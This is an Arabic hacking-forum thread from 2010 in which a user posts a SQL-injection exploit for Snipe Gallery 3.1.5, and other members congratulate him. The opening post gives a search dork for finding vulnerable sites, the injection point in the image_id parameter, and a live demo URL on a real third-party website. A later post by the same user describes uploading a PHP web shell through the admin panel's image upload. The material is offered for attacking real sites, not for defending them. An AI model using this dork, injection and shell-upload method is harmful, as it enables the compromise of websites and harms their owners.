:: vBspiders Professional Network ::
صفحة 1 من 3 1 23
عرض 40 مشاركات من هذا الموضوع لكل صفحة

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات (http://www.vbspiders.com/vb/f38.html)
-   -   ثغرة من اكتشافي ادخل يا [you] (http://www.vbspiders.com/vb/t31268.html)

mobdeen 06-26-2010 12:10 AM
ثغرة من اكتشافي ادخل يا [you]
 
السلام عليكم
والحمد لله اليوم اكتشفت ثغرة بنفسي والحمد لله
شوفو الثغرة
كود PHP:
# Exploit Title:   snipe gallery Script Sql Injection
# Date: 26/06/2010
# Author: dev!l ghost
# Email: aws(at)live(dot)it
# Site : www.h00forall.com
# Script url: http://sourceforge.net/projects/snipegallery/
# Version: 3.1.5
# Tested on: Windows
# CVE : ()
  
:::::::::::::::::::::::::
  
  
=================Exploit=================
DorK:(Snipe Gallery v.3.1.5 by Snipe.Net)

When You search with the dork you will find a lot of sites ,,enter
site and you will find a lot of pictures enter any picture and 
the pot the(')and start the inject

the inject is very easy 



----exploit----   

{{DeMo}}
http://www.onesteppublishing.com/snipe/image.php?page=1&search_type=and&image_id=78(SQLI)

---------greatz----------
Greatz to all my frinds and the all muslims 
and Volc4n0 and Golden Ice and mr.ip
and the all 

thank you 
كلمة شكر تكفيني وتشجعني على المزيد لا تنسون smilies15smilies15

وكري هك 06-26-2010 12:37 AM
الله يوفقك اخوي

وان شاء الله تطور اكثر وكثر

Mr.Ip 06-26-2010 12:55 AM
شكرأ خيو اوس يسلمو حبوب هه

kais bettaieb 06-26-2010 01:17 AM
مشكور و الى الامام لمزيد من الاكتشفات لثغرات اخرى

اسير الشمال 06-26-2010 02:46 AM
يعطيك الف الف عافيه يابطل

nnhacker 06-26-2010 03:04 AM
merci baucoup mon frere c t un bon travail

TheGame 06-26-2010 03:21 AM
بارك الله فيك اخي الى الامام بس اخي ممكن سوال لماذا عند استعمال امر order+by لا يقولي كم عامود مصاب ارجو الشرح

Zero 06-26-2010 04:41 AM
اقتباس:
المشاركة الأصلية كتبت بواسطة TheGame (المشاركة 158364)
بارك الله فيك اخي الى الامام بس اخي ممكن سوال لماذا عند استعمال امر order+by لا يقولي كم عامود مصاب ارجو الشرح
[align=center] قد تكون مرقعه او بلند[/align]

بغدادي2 06-26-2010 09:58 AM
شكرا ليك اخوي تقبل مروري

KOUROGA3 06-26-2010 10:40 AM
السلام عليكم اخي مبدع ديما وصل ماشاء الله الله يعطيك العافية وصل ديما مبدع

mobdeen 06-26-2010 11:49 AM
والله العظيم نورتو الموضوع
ونسيت اقول لكم عندما تدخل لوحة التحكم بس اضغط على
upload image
وارفع شلك بصيغةphp
وتكون مسار الشل
www.xxxxx.com/photos/shell.php

Sp1d3r 06-26-2010 01:36 PM
مبروك الإكتشاف

و في انتظار المزيد

mobdeen 06-27-2010 12:59 AM
نورتو الموضوع اشكركم

KaLa$nikoV 06-27-2010 10:11 AM
مبروك الاكتشاف يا اخوي

ياريت ترسلها لموقع

exploit-db.com

حتى يسجلوها باسمك

كل الي عليك تراسل هاد الايميل الموجود بالصفحه وتتبع الشروط


exploit-db/stuff

kEEp Up

KOUROGA3 06-27-2010 11:42 AM
السلام عليكم جميع احبائي و اخوني في الشبكة هذا اميلي kouroga3@hotmail.com دمت في رعاية الله وحفضه


الساعة الآن 10:33 AM
صفحة 1 من 3 1 23
عرض 40 مشاركات من هذا الموضوع لكل صفحة


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0